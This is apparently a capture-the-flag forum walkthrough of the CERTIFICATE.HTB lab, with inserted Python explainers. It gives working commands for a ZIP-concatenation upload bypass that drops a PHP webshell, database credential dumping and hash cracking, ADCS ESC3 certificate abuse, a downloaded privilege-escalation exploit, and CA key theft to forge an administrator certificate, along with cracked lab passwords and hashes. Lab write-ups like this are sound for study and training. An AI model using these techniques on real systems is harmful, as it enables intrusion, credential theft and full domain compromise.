02-07-25, 09:24 PM
TARGET: CERTIFICATE.HTB (If you want my cheat sheet with much more explanation I can provide it to you)
Code:
IP: 10.10.11.71
Hostname: certificate.htb
Domain: CERTIFICATE.HTB

ZIP file upload bypass for RCE

The web application accepts ZIP uploads but restricts what the archive may contain. The check is bypassed with the ZIP concatenation technique: two archives are joined, so a validator that reads the file from the front sees only the benign first archive, while the extractor that honours the end-of-central-directory record unpacks the second one.
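Why the concatenation works, as an added Python example that is not part of the original post: it builds the same two single-entry archives in memory, joins them the way `cat` does, and then parses the result twice, once walking local file headers from offset 0 (what a naive validator does) and once through the end-of-central-directory record (what PHP's ZipArchive, Python's zipfile and most extractors do). File names and contents are the ones used in this section; the validator walker is a constructed stand-in, not the target's code.

```python
import io
import struct
import zipfile

LOCAL_SIG = b"PK\x03\x04"
# Local file header layout (30 bytes), same as zipfile.structFileHeader
LOCAL_HDR = struct.Struct("<4s2B4HL2L2H")


def make_zip(name: str, data: bytes) -> bytes:
    """Single-entry, uncompressed ZIP built in memory (stand-in for `zip x.zip file`)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr(name, data)
    return buf.getvalue()


def build_polyglot(benign_name: str, benign: bytes, payload_name: str, payload: bytes) -> bytes:
    """Stand-in for `cat good.zip bad.zip > final.zip`: benign archive first, payload last."""
    return make_zip(benign_name, benign) + make_zip(payload_name, payload)


def names_from_front(blob: bytes) -> list:
    """Walk local file headers from offset 0, the way a naive upload validator does.
    The walk stops at the first signature that is not a local header, i.e. at the
    central directory of the *first* archive, so the second archive is never seen."""
    names, off = [], 0
    while blob[off:off + 4] == LOCAL_SIG:
        fields = LOCAL_HDR.unpack_from(blob, off)
        flags, csize, nlen, xlen = fields[3], fields[8], fields[10], fields[11]
        if flags & 0x08:
            # streamed entry: sizes live in a trailing data descriptor, cannot skip the data
            raise ValueError("data descriptor in use; sizes unknown up front")
        off += LOCAL_HDR.size
        names.append(blob[off:off + nlen].decode("utf-8"))
        off += nlen + xlen + csize
    return names


def entries_from_eocd(blob: bytes) -> dict:
    """Parse via the end-of-central-directory record, as real extractors do. The EOCD
    search runs backwards from the end of the file, so the *last* archive's central
    directory wins and only its entries (x.php) exist as far as the extractor knows."""
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        return {name: zf.read(name) for name in zf.namelist()}


if __name__ == "__main__":
    shell = b"<?php system($_GET['cmd']); ?>"
    final = build_polyglot("good.pdf", b"test\n", "x.php", shell)
    print("front-to-back validator sees:", names_from_front(final))
    print("EOCD-based extractor sees:   ", list(entries_from_eocd(final)))
```

The same differential is why a validator that only inspects the first entry (or only checks the file's leading magic bytes) is not a control: the extractor and the validator must parse the archive the same way, or the upload handler must reject archives with trailing data after the first end-of-central-directory record.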
Exploit technique:
Code:
# Benign archive that passes the upload check
echo "test" > good.pdf
# Archive carrying the PHP webshell
echo "<?php system(\$_GET['cmd']); ?>" > x.php
zip good.zip good.pdf
zip bad.zip x.php
# Concatenate: good.zip first (what the validator sees), bad.zip last (what the extractor reads)
cat good.zip bad.zip > final.zip

Execution:
Code:
# Navigate to course enrollment: http://certificate.htb/upload.php?s_id=44
# Upload final.zip
# Access the webshell via the extracted x.php (?cmd=...); it runs as xamppuser

Database credential extraction
MySQL enumeration:
Code:
# Credentials found in db.php: certificate_webapp_user:cert!f!c@teDBPWD
# Database enumeration from the non-interactive shell (run from the directory containing mysql.exe)
.\mysql.exe -u 'certificate_webapp_user' -p'cert!f!c@teDBPWD' -e 'show databases;'
.\mysql.exe -u 'certificate_webapp_user' -p'cert!f!c@teDBPWD' -e 'use certificate_webapp_db; show tables;'
.\mysql.exe -u 'certificate_webapp_user' -p'cert!f!c@teDBPWD' -e 'use certificate_webapp_db; select * from users;'

Extracted hashes:
Code:
sara.b:$2y$04$CgDe/Thzw/Em/M4SkmXNbu0YdFo6uUs3nB.pzQPV.g8UdXikZNdH6
# Other hashes failed to crack

Crack with hashcat:
Code:
# $2y$ prefix = bcrypt, hashcat mode 3200
hashcat -m 3200 hashes.txt /usr/share/wordlists/rockyou.txt

Result:
Code:
sara.b:Blink182

WinRM access and PCAP analysis
Code:
evil-winrm -u "sara.b" -p "Blink182" -i "10.10.11.71"

Kerberos AS-REQ extraction from PCAP:
Code:
# Capture found in ~/ws-01/WS-01PktMon.pcap
# Wireshark filter: kerberos.msg_type == 10 && kerberos.cipher
# msg_type 10 = AS-REQ; only the pre-authenticated request carries a cipher (the encrypted PA-ENC-TIMESTAMP)
tshark -r WS-01PktMon.pcap -Y "kerberos.msg_type==10 && kerberos.CNameString && kerberos.realm && kerberos.cipher" -T fields -e kerberos.CNameString -e kerberos.realm -e kerberos.cipher

Extracted cipher:
Code:
23f5159fa1c66ed7b0e561543eba6c010cd31f7e4a4377c2925cf306b98ed1e4f3951a50bc083c9bc0f16f0f586181c9d4ceda3fb5e852f0

Format for hashcat:
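How the hashcat line is assembled from the tshark fields output, as an added Python example that is not part of the original post. The sample tshark output is constructed from the values captured in this section (a duplicate line stands in for a retransmitted AS-REQ, and a line with an empty cipher column shows what you get if `kerberos.cipher` is left out of the display filter). The encryption type is passed in by hand because the page's hash cracked under mode 19900, i.e. etype 18; only the AES etypes 17 and 18 are mapped here.

```python
import re

# hashcat modes for Kerberos 5 pre-auth (PA-ENC-TIMESTAMP), keyed by encryption type
PREAUTH_MODES = {
    17: 19800,  # aes128-cts-hmac-sha1-96
    18: 19900,  # aes256-cts-hmac-sha1-96
}
# AES-CTS output = 16-byte confounder + DER-encoded timestamp + 12-byte HMAC-SHA1-96 tag
MIN_AES_CIPHER_BYTES = 16 + 12
HEX_RE = re.compile(r"^[0-9a-fA-F]+$")

# Values captured in this section
CIPHER = ("23f5159fa1c66ed7b0e561543eba6c010cd31f7e4a4377c2925cf306b98ed1e4"
          "f3951a50bc083c9bc0f16f0f586181c9d4ceda3fb5e852f0")
# Constructed tshark -T fields output (tab-separated): a retransmitted AS-REQ and one
# without pre-auth, neither of which should yield an extra hash line
SAMPLE_TSHARK_OUTPUT = (
    f"Lion.SK\tCERTIFICATE.HTB\t{CIPHER}\n"
    f"Lion.SK\tCERTIFICATE.HTB\t{CIPHER}\n"
    "Lion.SK\tCERTIFICATE.HTB\t\n"
)


def parse_tshark_fields(text: str) -> list:
    """Parse `-T fields -e kerberos.CNameString -e kerberos.realm -e kerberos.cipher` output.
    tshark joins repeated occurrences of one field with ',' so keep the first value per column."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        cols = [c.split(",")[0].strip() for c in line.split("\t")]
        if len(cols) != 3 or not cols[2]:
            continue  # AS-REQ without pre-auth data: nothing to crack
        rows.append(tuple(cols))
    return rows


def krb5pa_line(user: str, realm: str, cipher_hex: str, etype: int = 18) -> str:
    """Build `$krb5pa$<etype>$<user>$<realm>$<cipher>`. For the AES etypes the string-to-key
    salt is REALM + principal name, so user and realm are emitted exactly as captured,
    case included; changing the case silently makes the hash uncrackable."""
    if etype not in PREAUTH_MODES:
        raise ValueError(f"unsupported etype {etype}")
    if not HEX_RE.match(cipher_hex) or len(cipher_hex) % 2:
        raise ValueError("cipher is not an even-length hex string")
    if len(cipher_hex) // 2 < MIN_AES_CIPHER_BYTES:
        raise ValueError("cipher too short to hold confounder + HMAC")
    return f"$krb5pa${etype}${user}${realm}${cipher_hex}"


def hashcat_mode(etype: int = 18) -> int:
    return PREAUTH_MODES[etype]


def convert(text: str, etype: int = 18) -> list:
    """One hash line per distinct (user, realm, cipher); retransmissions are dropped."""
    seen, out = set(), []
    for user, realm, cipher in parse_tshark_fields(text):
        if (user, realm, cipher) in seen:
            continue
        seen.add((user, realm, cipher))
        out.append(krb5pa_line(user, realm, cipher, etype))
    return out


if __name__ == "__main__":
    for line in convert(SAMPLE_TSHARK_OUTPUT):
        print(line)
    print("hashcat -m", hashcat_mode(18), "hash.txt /usr/share/wordlists/rockyou.txt -a 0")
```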
Code:
$krb5pa$18$Lion.SK$CERTIFICATE.HTB$23f5159fa1c66ed7b0e561543eba6c010cd31f7e4a4377c2925cf306b98ed1e4f3951a50bc083c9bc0f16f0f586181c9d4ceda3fb5e852f0

Crack Kerberos hash:
Code:
# etype 18 (aes256-cts-hmac-sha1-96) pre-auth = hashcat mode 19900; user and realm are the string-to-key salt, so keep their case exactly as captured
hashcat -m 19900 hash.txt /usr/share/wordlists/rockyou.txt -a 0

Result:
Code:
lion.sk:!QAZ2wsx

ADCS ESC3 vulnerability exploitation
WinRM access:
Code:
evil-winrm -u "lion.sk" -p "!QAZ2wsx" -i "10.10.11.71"

ADCS enumeration:
Code:
certipy find -u 'lion.sk@certificate.htb' -p '!QAZ2wsx' -dc-ip 10.10.11.71 -vulnerable

ESC3 conditions identified (template Delegated-CRA on CA Certificate-LTD-CA):
- Extended Key Usage: Certificate Request Agent
- Enrollment Rights: CERTIFICATE.HTB\Domain CRA Managers (lion.sk is a member)
- Authorized Signatures Required: 0
- Private Key Flag: ExportableKey
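What certipy is checking when it flags the conditions above, as an added Python example (not from the original post and not certipy's code): it classifies certificate templates from their LDAP attributes into the two halves of an ESC3 chain, the agent template that hands out a Certificate Request Agent certificate and the target template the CA will then issue on behalf of another user. The template dictionaries are constructed: Delegated-CRA mirrors the conditions listed above, while SignedUser's attribute values (schema version, authorized-signature count and RA application policy) and the two negative cases are assumptions chosen to exercise each rule. Enrollment rights are given pre-resolved to group names, as certipy prints them; parsing nTSecurityDescriptor is out of scope here. lion.sk's Domain Users membership is likewise assumed.

```python
# EKU / application policy OIDs as stored in pKIExtendedKeyUsage and msPKI-RA-Application-Policies
EKU_CERT_REQUEST_AGENT = "1.3.6.1.4.1.311.20.2.1"
EKU_CLIENT_AUTH = "1.3.6.1.5.5.7.3.2"
EKU_SMARTCARD_LOGON = "1.3.6.1.4.1.311.20.2.2"
EKU_PKINIT_CLIENT_AUTH = "1.3.6.1.5.2.3.4"
EKU_ANY_PURPOSE = "2.5.29.37.0"
EKU_SERVER_AUTH = "1.3.6.1.5.5.7.3.1"
AUTH_EKUS = {EKU_CLIENT_AUTH, EKU_SMARTCARD_LOGON, EKU_PKINIT_CLIENT_AUTH, EKU_ANY_PURPOSE}
CT_FLAG_PEND_ALL_REQUESTS = 0x2  # msPKI-Enrollment-Flag bit: manager approval required


def _template(name, ekus, ra_sig, ra_policies, enroll_flag, schema, rights):
    return {"name": name, "pKIExtendedKeyUsage": ekus, "msPKI-RA-Signature": ra_sig,
            "msPKI-RA-Application-Policies": ra_policies, "msPKI-Enrollment-Flag": enroll_flag,
            "msPKI-Template-Schema-Version": schema, "enrollment_rights": rights}


# Constructed templates; only Delegated-CRA's values come from the page
TEMPLATES = [
    _template("Delegated-CRA", [EKU_CERT_REQUEST_AGENT], 0, [], 0, 2,
              ["CERTIFICATE.HTB\\Domain CRA Managers"]),
    _template("SignedUser", [EKU_CLIENT_AUTH], 1, [EKU_CERT_REQUEST_AGENT], 0, 2,
              ["CERTIFICATE.HTB\\Domain Users"]),                      # assumed attribute values
    _template("ApprovedUser", [EKU_CLIENT_AUTH], 1, [EKU_CERT_REQUEST_AGENT],
              CT_FLAG_PEND_ALL_REQUESTS, 2, ["CERTIFICATE.HTB\\Domain Users"]),  # manager approval
    _template("WebServer", [EKU_SERVER_AUTH], 0, [], 0, 1,
              ["CERTIFICATE.HTB\\Domain Users"]),                      # no authentication EKU
]
LION_SK_GROUPS = {"CERTIFICATE.HTB\\Domain CRA Managers", "CERTIFICATE.HTB\\Domain Users"}


def _enrollable(t, principals):
    """We hold enrollment rights and no manager has to approve the request."""
    return (not (t["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS)
            and bool(set(t["enrollment_rights"]) & principals))


def is_agent_template(t, principals):
    """ESC3 condition 1: issues Certificate Request Agent certificates to us
    without requiring an authorized signature."""
    return (EKU_CERT_REQUEST_AGENT in t["pKIExtendedKeyUsage"]
            and t["msPKI-RA-Signature"] == 0
            and _enrollable(t, principals))


def is_agent_enrollable_target(t, principals):
    """ESC3 condition 2: an authentication template the CA issues on behalf of another user
    when the request is co-signed by an enrollment agent. Schema version 1 templates accept
    agent-signed requests as-is; version 2+ templates must require exactly one authorized
    signature whose application policy is Certificate Request Agent."""
    if not (set(t["pKIExtendedKeyUsage"]) & AUTH_EKUS) or not _enrollable(t, principals):
        return False
    if t["msPKI-Template-Schema-Version"] == 1:
        return True
    return (t["msPKI-RA-Signature"] == 1
            and EKU_CERT_REQUEST_AGENT in t["msPKI-RA-Application-Policies"])


def esc3_chains(templates, principals):
    """Every (agent template, target template) pair usable for the two-step request."""
    agents = [t["name"] for t in templates if is_agent_template(t, principals)]
    targets = [t["name"] for t in templates if is_agent_enrollable_target(t, principals)]
    return [(a, b) for a in agents for b in targets]


if __name__ == "__main__":
    for agent, target in esc3_chains(TEMPLATES, LION_SK_GROUPS):
        print(f"ESC3: enroll in {agent}, then request {target} -on-behalf-of the victim")
```

A second gate not modelled here: the CA itself can restrict which agents may enrol on whose behalf for which templates (enrollment agent restrictions); the classifier only tells you the templates allow it.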
ESC3 exploitation:
Code:
# Step 1: Request an enrollment agent certificate from the Delegated-CRA template
certipy req -u 'lion.sk@certificate.htb' -p '!QAZ2wsx' -dc-ip 10.10.11.71 -ca 'Certificate-LTD-CA' -template 'Delegated-CRA'
# Step 2: Use it to request a certificate on behalf of ryan.k.
# For -template pick one that has Client Authentication enabled and that lion.sk has enrollment rights on (here SignedUser)
certipy req -u 'lion.sk@certificate.htb' -p '!QAZ2wsx' -dc-ip 10.10.11.71 -ca 'Certificate-LTD-CA' -template 'SignedUser' -on-behalf-of ryan.k -pfx lion.sk.pfx
# Step 3: Authenticate with the certificate (sync the clock first; Kerberos rejects requests outside the allowed skew)
ntpdate certificate.htb
certipy auth -pfx ryan.k.pfx

Result:
Code:
ryan.k@certificate.htb: aad3b435b51404eeaad3b435b51404ee:b1bc3d70e70f4f36b1509a65ae1a2ae6

Privesc via SeManageVolumePrivilege
Pass-the-hash access:
Code:
evil-winrm -u "ryan.k" -H "b1bc3d70e70f4f36b1509a65ae1a2ae6" -i 10.10.11.71

SeManageVolumePrivilege exploitation:
Code:
# Download and run SeManageVolumeExploit on the target: https://github.com/CsEnox/SeManageVolumeExploit/releases/tag/public
# Verify the ACL change
icacls C:\Windows
# Should show BUILTIN\Users with (M) modify permissions; if you see "administrator" instead of Users, rerun the exploit

Root access via CA private key extraction (I tried DLL hijacking but EDR blocks it)
Export CA private key:
Code:
# Export the CA certificate and its private key from the local machine "my" store
certutil -exportPFX my "Certificate-LTD-CA" C:\temp\x.pfx
# Download x.pfx to the attacker machine

Admin certificate forgery:
Code:
# Sign a certificate for the administrator UPN with the stolen CA key (golden certificate)
certipy forge -ca-pfx x.pfx -upn 'administrator@certificate.htb' -out system.pfx

Administrator authentication:
Code:
ntpdate certificate.htb
certipy auth -pfx system.pfx

Admin NTLM hash:
Code:
administrator@certificate.htb: aad3b435b51404eeaad3b435b51404ee:d804304519bf0143c14cbf1c024408c6

Credentials summary for noob and larper
Code:
sara.b:Blink182 (WinRM)
lion.sk:!QAZ2wsx (WinRM)
certificate_webapp_user:cert!f!c@teDBPWD (MySQL)
ryan.k:b1bc3d70e70f4f36b1509a65ae1a2ae6 (Pass-the-Hash)
administrator:d804304519bf0143c14cbf1c024408c6 (Pass-the-Hash)